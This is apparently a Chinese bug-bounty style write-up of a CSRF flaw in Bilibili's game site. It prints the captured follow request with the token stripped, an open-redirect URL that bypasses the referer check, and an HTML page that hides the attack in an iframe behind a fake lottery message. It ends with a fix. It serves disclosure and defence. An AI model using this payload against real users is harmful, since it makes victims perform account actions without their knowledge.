[关闭]
@1kbfree 2019-07-05T21:06:48.000000Z 字数 2064 阅读 3001

app.biligame通过Url跳转实现csrf关注用户

漏洞挖掘

复现步骤

1、打开Url:http://app.biligame.com/user_center?vmid=237211763

image_1ck46ab8leb0rps12fu91c1e6u9.png-372.2kB

2、点击关注并且抓包并且将其转化为GET请求,然后删除csrf_token,如下

  1. GET /game/center/h5/user/relationship/modify_stat?fid=22297479&act=1&re_src=99&request_id=qnZfxMgqL8qF4sKlXDvBZxUp3tjiL21e&device_id=&build=&mid=&source_from=0&cur_host=app HTTP/1.1
  2. Host: line3-h5-mobile-api.biligame.com
  3. User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
  4. Accept: application/json, text/javascript, */*; q=0.01
  5. Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
  6. Accept-Encoding: gzip, deflate
  7. DNT: 1
  8. Referer: http://app.biligame.com/user_center?vmid=22297479
  9. Origin: http://app.biligame.com
  10. Cookie: 马赛克
  11. Connection: close

image_1ck3206641lekcue1kao4ggn3om.png-154.4kB

当我构造为csrf poc的时候,发现这里居然有验证referer,目录格式也绕不过,然后我就想放弃,突然找到一处url跳转漏洞,然后就有了下面的攻击步骤

3、打开Url跳转处

  1. http://my.biligame.com/smz/?orgUrl=http://www.baidu.com/

但是这里有过滤orgUrl参数的,但是因为我们评论的页面是app.biligame的,所以是可以利用的,poc如下

  1. http://my.biligame.com/smz/?orgUrl=http%3A%2f%2fline3-h5-mobile-api.biligame.com%2fgame%2fcenter%2fh5%2fuser%2frelationship%2fmodify_stat%3Ffid%3D22297479%26act%3D1%26re_src%3D99%26request_id%3DqnZfxMgqL8qF4sKlXDvBZxUp3tjiL21e%26device_id%3D%26build%3D%26mid%3D%26source_from%3D0%26cur_host%3Dapp

image_1ck46es9919cn16nbhnm1r2ik9e16.png-251.4kB

image_1ck46f5el49518gua091ljnkj1j.png-102.7kB

这里虽然成功回复,但是需要等待,不行,得再完美一下(写个html页面),如下

  1. <!DOCTYPE html>
  2. <html lang="en">
  3. <head>
  4.     <meta charset="UTF-8">
  5.     <title>Document</title>
  6. </head>
  7. <style>
  8.     iframe{
  9.         display: none;
  10.     }
  11. </style>
  12. <body>
  14. <h1>正在抽奖中,5秒后得出结果...</h1>
  16. <iframe src="http://my.biligame.com/smz/?orgUrl=http%3A%2f%2fline3-h5-mobile-api.biligame.com%2fgame%2fcenter%2fh5%2fuser%2frelationship%2fmodify_stat%3Ffid%3D22297479%26act%3D1%26re_src%3D99%26request_id%3DqnZfxMgqL8qF4sKlXDvBZxUp3tjiL21e%26device_id%3D%26build%3D%26mid%3D%26source_from%3D0%26cur_host%3Dapp"></iframe>
  18. </body>
  19. </html>

image_1ck46i2fp7v6170o1aol1cj4t3n20.png-131.8kB

image_1ck46ik7ddek71p1hac1n6osc42d.png-376.8kB

成功回复~

漏洞poc

  1. http://my.biligame.com/smz/?orgUrl=http%3A%2f%2fline3-h5-mobile-api.biligame.com%2fgame%2fcenter%2fh5%2fuser%2frelationship%2fmodify_stat%3Ffid%3D22297479%26act%3D1%26re_src%3D99%26request_id%3DqnZfxMgqL8qF4sKlXDvBZxUp3tjiL21e%26device_id%3D%26build%3D%26mid%3D%26source_from%3D0%26cur_host%3Dapp

修复方案

严格严重Token,不要单依靠referer来限制csrf攻击~

添加新批注
在作者公开此批注前,只有你和作者可见。
回复批注